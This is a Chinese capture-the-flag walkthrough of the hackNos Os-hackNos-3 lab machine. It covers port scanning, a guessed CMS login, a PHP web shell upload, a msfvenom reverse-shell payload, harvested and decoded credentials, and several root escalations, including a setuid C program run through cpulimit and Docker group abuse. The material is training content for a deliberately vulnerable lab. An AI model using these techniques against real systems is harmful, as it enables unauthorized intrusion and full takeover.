2月14情人节,搞靶机和下雪天更配哦~
靶机信息
Name: hackNos: Os-hackNos-3
Date release: 14 Dec 2019
Author: Rahul Gehlaut
Difficulty : Intermediate
Flag : 2 Flag first user And second root
Learning : Web Application | Enumeration | Privilege Escalation
- Download
- Download (Mirror)
- Download (Torrent) (Magnet)
信息搜集
先探测主机IP,因为虚拟机配置的Host-Only网络模式,通过查看本机虚拟网卡可以确定IP段。
➜ sudo nmap -sS -O 192.168.56.0/24
确定主机IP:192.168.56.105扫一下端口看看有哪些服务。
➜ sudo nmap -sT -A 192.168.56.105
Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-14 19:56 CST
Nmap scan report for 192.168.56.105
Host is up (0.00049s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ce:16:a0:18:3f:74:e9:ad:cb:a9:39:90:11:b8:8a:2e (RSA)
| 256 9d:0e:a1:a3:1e:2c:4d:00:e8:87:d2:76:8c:be:71:9a (ECDSA)
|_ 256 63:b3:75:98:de:c1:89:d9:92:4e:49:31:29:4b:c0:ad (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: WebSec
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerneldirsearch的结果:
[20:00:32] 200 - 195B - /index.html
[20:00:35] 301 - 318B - /scripts -> http://192.168.56.105/scripts/
[20:00:35] 200 - 2KB - /scripts/
[20:00:36] 403 - 279B - /server-status
[20:00:36] 403 - 279B - /server-status/
[20:00:37] 200 - 0B - /upload.php访问发现http://192.168.56.105/scripts/直接列目录,有如下文件:
api_ticket_create.php
automail.php
automail.pl
rcron.php漏洞发现&getshell
一番搜索后发现是osticket搭建的邮件系统,没发现可利用的点。
感觉还有其他的的页面没扫出来,上DirBuster爆破。很快发现了/websec目录,看目录结构是个博客系统。
http://192.168.56.105/websec/admin后台登录页面。登录信息为邮箱+密码。按照HackNos靶机的传统应该是和HackNos相关的信息,想到index页面刚才看到了有邮箱地址和一些标题,遂拿来尝试登录,试了两个就成功登录。(果然是HackNos一贯风格)
邮箱:contact@hacknos.com
密码:Securityx 成功进入后台,是Gila CMS v1.10.9,利用文件管理功能上传文件写入一句话shell,http://192.168.56.105/websec/admin/fm,然后通过重命名移动到网站根目录src/blog/../../../one.php
蚁剑连接,拿到第一个flag
/home/blackdevil/user.txt
bae11ce4f67af91fa58576c1da2aad4bPS:这里可以拿cwel来制作用户密码字典进行爆破
➜ ./cewl.rb http://192.168.56.105/websec/ > /Users/lanvnal/Files/Vulnhub/HackNos-3/oshacknos3dict.
✦ ➜ cat /Users/lanvnal/Files/Vulnhub/HackNos-3/oshacknos3dict.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
hackNos
com
and
Bootstrap
JavaScript
Start
www
Out
More
Securityx
has
everything
you
need
get
your
new
website
running
time
All
the
templates
themes
are
open
source
free
download
easy
use
strings
attached
Get
Started
Your
Service
contact
hacknos
core
Plugin
Custom
scripts
for
this
Navigation
template
About
Services
Portfolio
Contact
Security
Find提权
信息搜集
先上MSF。
➜ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=6666 -f elf -o /Users/lanvnal/Files/Vulnhub/HackNos-3/shell.elf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1在config.php发现数据库配置信息,去数据库里看一看。
$GLOBALS['config'] = array (
'db' =>
array (
'host' => 'localhost',
'user' => 'cmsu',
'pass' => 'securityx',
'name' => 'cms',
),MariaDB [cms]> select username,pass from user;
select username,pass from user;
+----------+--------------------------------------------------------------+
| username | pass |
+----------+--------------------------------------------------------------+
| admin | $2y$10$E1OkzxLN.G4ZUYGgrGoQFusEFlkgNBeey9v7SI6jDHZQgL7G.YDFO |
+----------+--------------------------------------------------------------+无法解密,也没啥有用的信息。
那就上LinEnum搜集信息看看吧。从结果来看没有可以用来SUID提权的应用,也没有奇怪的进程。
有价值的信息如下:
[-] It looks like we have some admin users:
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm)
uid=1000(blackdevil) gid=118(docker) groups=118(docker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lxd)
[+] Looks like we're hosting Docker:
Docker version 19.03.2, build 6a30dfca03有Docker,可能是利用docker提权,然后blackdevil用户在docker组里,而且他还在sudo组。那么关键就是blackdevil用户了。接下里就是想办法搜集blackdevil的信息,找到他的密码。
左翻右翻在/var/local/目录下发现了名为database的文件,内容如下:
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet以为是个费用记录,但是最后一行有点奇怪,去搜索一番,发现原来是结果encode的。
在该网站可以decode。
该网站对于spreadsheet加密的解释如下:
There are terrific tools (like PGP and GPG) for encrypting your mail. If somebody along the way looks at the mail they can't understand it. But they do know you are sending encrypted mail to your pal.
The answer: encode your message into something innocent looking.
Your messages will be safe and nobody will know they're encrypted!意思就是加密邮件内容,保证邮件安全。
解码后内容为:Security@x@,也就是balckdevil用户的密码。
提权
方法1:直接sudo
blackdevil@hacknos:/home$ sudo -l
[sudo] password for blackdevil:
Matching Defaults entries for blackdevil on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User blackdevil may run the following commands on hacknos:
(ALL : ALL) ALL
blackdevil@hacknos:/home$ sudo cat /root/root.txt
######## ##### ##### ######## ########
## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ##
######## ## ## ## ## ## ########
## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ##
## ## ##### ##### ## ####### ## ##
MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b
Author: Rahul Gehlaut
Blog: www.hackNos.com
Linkedin: https://in.linkedin.com/in/rahulgehlaut方法2:Docker提权
上传Docker镜像和Dockerfile -> 构建镜像 -> 创建docker同时挂载etc目录 -> docker创建用户加入sudo组 -> 退出docker切换新建用户 -> 拥有sudo权限
过程同:http://lanvnal.com/2020/02/01/Vulnhub靶机之ReconForce01/#docker提权
方法3:利用cpulimit提权
www-data用户是没sudo权限的。可以在本地编译一个以root身份调用/bin/bash的C程序,然后配合cpulimit执行,达到提权的目的。
cpulimit利用方法:https://gtfobins.github.io/gtfobins/cpulimit/#sudo
sudo cpulimit -l 100 -f /bin/shwww-data用户没法sudo执行该指令。
在本机将下面源码编译,上传到靶机上给777权限,然后搭配cpulimit运行。
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}编译:
✦ ➜ gcc exp.c -o exp
exp.c:9:3: warning: implicit declaration of function 'system' is invalid in C99
[-Wimplicit-function-declaration]
system("/bin/bash");
^
1 warning generated.上传后chmod然后和cpulimit一起用:
www-data@hacknos:/tmp$ chmod 777 exp2
chmod 777 exp2
www-data@hacknos:/tmp$ cpulimit -l 100 -f ./exp2
cpulimit -l 100 -f ./exp2
Process 6468 detected
root@hacknos:/tmp# whoami
whoami
root
root@hacknos:/tmp# cat /root/root.txt这里遇到个问题就是MAC下编译的程序在靶机上会报错,Ubuntu下编译的exp2就可以使用。
总结
这个靶机比较偏重信息搜集,同时第三种提权方式涨姿势了。
